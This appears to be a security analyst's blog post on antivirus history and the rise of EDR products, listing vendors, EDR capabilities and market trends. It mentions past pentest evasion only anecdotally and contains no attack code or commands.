top of page

Walking Among the Valley of Kings: EDR Rising and the End of the Antivirus Era

It was 1971 when the first known virus began infecting PDP-10 mainframe computers manufactured by then Digital Equipment Corporation (DEC). In order to delete the infected files, Ray Tomlinson developed the first known software to hunt down and delete the virus dubbed Reaper. This would later be followed by the first known antivirus software in 1987 when a German computer security expert Bernd Robert Fix came up with the first recorded antivirus software program designed to remove the Vienna virus that was designed to infect .com files in the DOS operating system. Later, German company G Data Software AG released the first known antivirus software designed to be used on Atari ST computers, followed shortly by McAfee, Inc. now owned by Intel, who released its first antivirus scanner dubbed Viruscan after its founding in 1987.

The antivirus industry would quickly mature over the next decade and a half to 2003 when I along with other cybersecurity engineers around the world were working tirelessly to remediate SQL Slammer worm infections. Despite having antivirus software installed on our endpoints, these hosts were still becoming infected, underscoring what I always believed would be the eventual sunsetting of this traditional approach to antivirus. This worm outbreak required me along with several colleagues to stay in a nearby hotel to work throughout the day and night to clean the infections off hosts that despite having Symantec Endpoint Protection installed, were still getting infected. Symantec's technical support team's response? Go download their individual cleaner tool, Symantec Eraser. The continuous effort to download updated DAT files was still ineffective at catching every variant so their solution was to direct customers to their Eraser tool to clean infected hosts instead.

This is just one incident response event among many in my history along with penetration tests I performed where I was able to shut down specific antivirus software with a module within Metasploit Framework, upload a backdoor to a compromised host built with veil-framework that went unnoticed by the AV, and so on and so on.. But my stories are just a few in the thousands that are out there that exist in the annals of history of antivirus software fails dating back to 1994 when I first started learning how to hack from hackers on IRC channels in EFNET (back when IRC was a "thing") using dialup accounts to Concentric Internet Services (CRIS) using my Procomm Plus dialer and a 2400 baud modem (end nerd flashback).

Fast forward to 2002 and enter the EDR startup landscape -- startups that came in attempting to unseat the old guard. Coincidentally enough, just six years later in 2008 as Endgame was making its debut, a hacking competition at the annual Defcon security conference dubbed "Race to Zero" was to evidence to the world that legacy antivirus was indeed now dead by having participants tweak known viruses in an attempt to foil signature-based blacklists of several major antivirus engines despite the lament of several of the AV vendors for the mere idea of holding a contest like this. The competition's organizer simply responded to the AV industry, "we're just pointing out the basic flaw in signature-based antivirus."

The contenders that would begin putting downward market pressure on the traditional antivirus companies beginning in 2002 would include Carbon Black founded in 2002; Countertack, 2004; Tanium, 2007; Endgame, 2008; Crowdstrike, 2011; Cybereason, 2012; Cylance, 2012; and SentinelOne in 2013 just to name a select few.

So what makes EDR different from traditional antivirus/EPP solutions?

  • They don't use signatures or patterns: EDR will typically use machine learning (ML) models to detect threats to a system at pre-, during-, and post-execution phases of a weaponized file and file-less malware. Methods for performing this analysis across numerous solutions include static AI and behavioral AI instead of looking for known patterns in the file making evasion far more difficult with EDR solutions.

  • Contextual History: EDR is capable of piecing together the individual pieces in a long line of bread crumbs in a a malware infection, tracing it back to its originating process in an entire thread of activity akin to a virtual storybook, such as the capability offered by SentinelOne (research report pending). This approach upholds the now widely held belief that data without context is useless.

  • Expanded Response Actions: Traditional antivirus typically deleted the file or quarantined it until an analyst could investigate it further. EDR on the other hand is capable of performing autonomous response without requiring human interaction, going as far as being able to isolate a host from the network, auto-immunize endpoints, and as a final safety measure, can even roll back an endpoint to a pre-infected state.

  • Interrelationship tracking of processes: EDR is also capable of tracking all processes and their interrelationships regardless of how long they are active and what spawned it. EDR is capable of detecting malware in files, scripts, weaponized documents, lateral movement, and even file-less malware.

  • MITRE ATT&CK: EDR typically covers a much broader range of the MITRE ATT&CK model, to include persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, execution, and command and control.

  • Threat Hunting: EDR provides threat hunting capabilities to analysts that leverage machine learning and user entity behavior analytics (UEBA) to inform the analyst of potential risks. The analyst can leverage EDR to investigate potential risks -- tracking suspicious behavior in the network. The hypothesis formed by the hunt team using EDR can focus hunting efforts on known exploits, potential bad actors or assets, and data of value.

This is just a partial list, but you get my point. While not all EDR is created equal, it's important to note that EDR is indeed here to stay as Sand Hill Road pours more venture capital into this market fueled by market valuations of the global EDR market of $5.9 Bn by 2025 and growth at a CAGR of 28.8% between 2018 to 2025.

And there is certainly no shortage of evidence that legacy antivirus solutions are indeed on their way out as my discussions with CISOs at different company sizes and in different markets testify to budgets being reallocated from legacy AV to EDR -- the new shiny toy promising a brighter future in malware and ransomware detection and response. Simply put, CISOs are quickly growing tired of missed ransomware and malware that they see EDR as being more effective in stopping and require more autonomous response capabilities from their solutions that don't rely on the human analysts they can't seem to employ or keep due to the global cybersecurity talent shortage.

While many of the legacy antivirus solutions have begun adding in EDR capabilities and will argue that they cover just as many if not more of the ATT&CK matrix, according to the CISOs I've interviewed, the old guard still faces a growing branding problem. Market perception is still heavily skewed towards seeing these companies as legacy antivirus despite having ML and autonomous response capabilities. These companies will need to invest heavily into market education on their new technology stacks that no longer include traditional detection and response approaches using only signatures.

While the lineal descendants of EDR have begun expanding their flagship products to include EDR and CASB in an attempt to respond to market demands and lost market share to the freshman class, buying patterns of CISOs as they reallocate their budgets to EDR companies proves that the old guard must innovate and educate to stay relevant or suffer the consequences of being relegated to the history books as short-reigning kings.

My next market report at Aite Group will cover the entire EDR landscape and profile the individual EDR vendors and the idiosyncratic differences between the solutions. If you're an EDR vendor and wish to make sure you're profiled in my upcoming market report, please have your Analyst Relations team contact me.

18 views0 comments

Recent Posts

See All

Zero Trust Cybersecurity

Introduction In today's digital world, where online threats are a big concern, traditional security methods are not always enough. That is where Zero Trust cybersecurity comes in, it is a new framewor


bottom of page